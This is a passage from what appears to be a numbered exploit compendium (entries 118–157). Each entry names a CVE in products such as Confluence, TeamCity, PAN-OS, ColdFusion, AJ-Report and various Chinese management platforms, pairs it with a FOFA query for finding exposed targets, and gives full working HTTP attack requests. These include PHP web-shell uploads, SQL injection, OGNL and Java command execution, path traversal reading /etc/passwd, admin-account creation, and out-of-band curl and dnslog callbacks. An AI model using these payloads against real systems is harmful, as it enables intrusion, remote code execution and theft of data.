Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (北京百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo (北京百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (北京百绰) Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Baichuo (北京百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

File path: boot/web/upload/weblogo/1.php

122. Beijing Byzoro (百绰) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected versions: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall (云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (科立迅) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kelixun (科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
Default credentials: admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected versions:
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the temporary file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The uploaded file is returned in the response and can be accessed at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
· TBK DVR-4104
· TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"
